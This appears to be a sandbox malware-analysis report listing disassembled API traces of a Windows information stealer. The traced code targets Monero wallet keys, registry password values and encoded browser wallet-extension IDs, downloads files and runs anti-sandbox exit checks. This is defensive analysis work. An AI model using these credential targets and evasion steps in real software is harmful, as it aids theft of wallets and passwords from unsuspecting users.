                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateChangeCopyCreateDeleteFindFreeNotificationOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 2023266049-218353709
                                    • Opcode ID: 484930bce351f8cb11f9dadcc362142a501d67dcf8d61152e366eecb3a98209e
                                    • Instruction ID: dc22a4d24e3d8ca49e7b3c78e599ab756966429050db565c9ee216bc1397e7e6
                                    • Opcode Fuzzy Hash: 484930bce351f8cb11f9dadcc362142a501d67dcf8d61152e366eecb3a98209e
                                    • Instruction Fuzzy Hash: 6B51E1B29501195BCF15FB60DC96AED737CAF65300F8045A8B60A62091EF706B89CFE6
                                    APIs
                                      • Part of subcall function 00187310: memset.MSVCRT ref: 00187354
                                      • Part of subcall function 00187310: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0018737A
                                      • Part of subcall function 00187310: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001873F1
                                      • Part of subcall function 00187310: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018744D
                                      • Part of subcall function 00187310: GetProcessHeap.KERNEL32(00000000,?), ref: 00187492
                                      • Part of subcall function 00187310: HeapFree.KERNEL32(00000000), ref: 00187499
                                    • lstrcat.KERNEL32(35BFF020,001A17A0), ref: 00187646
                                    • lstrcat.KERNEL32(35BFF020,00000000), ref: 00187688
                                    • lstrcat.KERNEL32(35BFF020, : ), ref: 0018769A
                                    • lstrcat.KERNEL32(35BFF020,00000000), ref: 001876CF
                                    • lstrcat.KERNEL32(35BFF020,001A17A8), ref: 001876E0
                                    • lstrcat.KERNEL32(35BFF020,00000000), ref: 00187713
                                    • lstrcat.KERNEL32(35BFF020,001A17AC), ref: 0018772D
                                    • task.LIBCPMTD ref: 0018773B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 419b90dac8e658fadcb74891ad5ab2c10a420638e5c3599aa962c9c8cd2d5630
                                    • Instruction ID: 08263cc0c034f79f0dd37bd130419788f1bcbe6844b0bbb19344210476b59d3c
                                    • Opcode Fuzzy Hash: 419b90dac8e658fadcb74891ad5ab2c10a420638e5c3599aa962c9c8cd2d5630
                                    • Instruction Fuzzy Hash: 40313E76910109EFCB05EBE0DC9ADEF7779AB55701F648018F102A7290DB78AA46CFA0
                                    APIs
                                    • memset.MSVCRT ref: 00187354
                                    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0018737A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001873F1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018744D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00187492
                                    • HeapFree.KERNEL32(00000000), ref: 00187499
                                    • task.LIBCPMTD ref: 00187595
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: Password
                                    • API String ID: 2808661185-3434357891
                                    • Opcode ID: 8e8b66c8911a60b742a7bd07208dbc73e6a3aaf65cc0d5950aff8707930f63b9
                                    • Instruction ID: 4c1b968ff086248a86915512832eda9a634539a6c16dff5f623450f12ed34102
                                    • Opcode Fuzzy Hash: 8e8b66c8911a60b742a7bd07208dbc73e6a3aaf65cc0d5950aff8707930f63b9
                                    • Instruction Fuzzy Hash: CB611FB59042589BDB24EF50CC45BD9B7B8BF58300F1081D9E649A6181DF709BC9CF90
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00196FE2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019701F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001970A3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001970AA
                                    • wsprintfA.USER32 ref: 001970E0
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 7b10962edc3f4c2e3143dd03e536680fbabcdc64730af641473eaa935df4ed56
                                    • Instruction ID: ba5cc04cde04d7a9f9e76ae00e7b8969f85f5e539bab53b3da9fa10b3d6f5469
                                    • Opcode Fuzzy Hash: 7b10962edc3f4c2e3143dd03e536680fbabcdc64730af641473eaa935df4ed56
                                    • Instruction Fuzzy Hash: 1441B1B1D04248EBDF14DF94DC45BEEBBB8BF19710F144498F509A7280D7746A48CBA5
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
                                      • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                      • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                    • InternetOpenA.WININET(001A0DE2,00000001,00000000,00000000,00000000), ref: 0018615F
                                    • StrCmpCA.SHLWAPI(?,013AE450), ref: 00186197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001861DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00186203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0018622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0018625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00186299
                                    • InternetCloseHandle.WININET(?), ref: 001862A3
                                    • InternetCloseHandle.WININET(00000000), ref: 001862B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: c5f66bfc521b9d8d06a9cfdd111936c37a879e8b96f69acd0390331d80d38db7
                                    • Instruction ID: 5f17ab305caf7f294a3088a11efd0e753b9abd0ffdb3f5d3f089f12ce91bb860
                                    • Opcode Fuzzy Hash: c5f66bfc521b9d8d06a9cfdd111936c37a879e8b96f69acd0390331d80d38db7
                                    • Instruction Fuzzy Hash: 6F516CB1A10208AFDF24EFA0CC49BEE7779AF44301F508098B605A71C1DBB46B89CF95
                                    APIs
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0588), ref: 001992B1
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05A0), ref: 001992CA
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05B8), ref: 001992E2
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05D0), ref: 001992FA
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05E8), ref: 00199313
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A8B50), ref: 0019932B
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,01396360), ref: 00199343
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013964E0), ref: 0019935C
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0600), ref: 00199374
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0630), ref: 0019938C
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0648), ref: 001993A5
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0690), ref: 001993BD
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,01396640), ref: 001993D5
                                      • Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0660), ref: 001993EE
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 001811D0: ExitProcess.KERNEL32 ref: 00181211
                                      • Part of subcall function 00181160: GetSystemInfo.KERNEL32(?), ref: 0018116A
                                      • Part of subcall function 00181160: ExitProcess.KERNEL32 ref: 0018117E
                                      • Part of subcall function 00181110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
                                      • Part of subcall function 00181110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
                                      • Part of subcall function 00181110: ExitProcess.KERNEL32 ref: 00181143
                                      • Part of subcall function 00181220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
                                      • Part of subcall function 00181220: ExitProcess.KERNEL32 ref: 00181294
                                      • Part of subcall function 00196210: GetUserDefaultLangID.KERNEL32 ref: 00196214
                                      • Part of subcall function 00181190: ExitProcess.KERNEL32 ref: 001811C6
                                      • Part of subcall function 001972F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
                                      • Part of subcall function 001972F0: RtlAllocateHeap.NTDLL(00000000), ref: 00197327
                                      • Part of subcall function 001972F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F
                                      • Part of subcall function 00197380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
                                      • Part of subcall function 00197380: RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
                                      • Part of subcall function 00197380: GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • OpenEventA.KERNEL32(rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx,00000000,00000000,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 0019656A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196588
                                    • CloseHandle.KERNEL32(00000000), ref: 00196599
                                    • Sleep.KERNEL32(00001770), ref: 001965A4
                                    • CloseHandle.KERNEL32(?,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 001965BA
                                    • ExitProcess.KERNEL32 ref: 001965C2
                                    Strings
                                    • rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx, xrefs: 00196565
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID: rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx
                                    • API String ID: 2931873225-2363891162
                                    • Opcode ID: 04c6308c6f1abd13918b803d0aad72ea87485e9e75e40f3593a1c3a758bf2479
                                    • Instruction ID: a6ac5858a10daf9ef75b063381abae8445808c3e2337fe42b5e35f506e4395be
                                    • Opcode Fuzzy Hash: 04c6308c6f1abd13918b803d0aad72ea87485e9e75e40f3593a1c3a758bf2479
                                    • Instruction Fuzzy Hash: C231F871910208AADF05FBF0DC56BAE777DAF65740F904528F512A6092DFB06A09CBA2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE
                                    • lstrlen.KERNEL32(00000000), ref: 0018BADD
                                      • Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0018BB0B
                                    • lstrlen.KERNEL32(00000000), ref: 0018BBE3
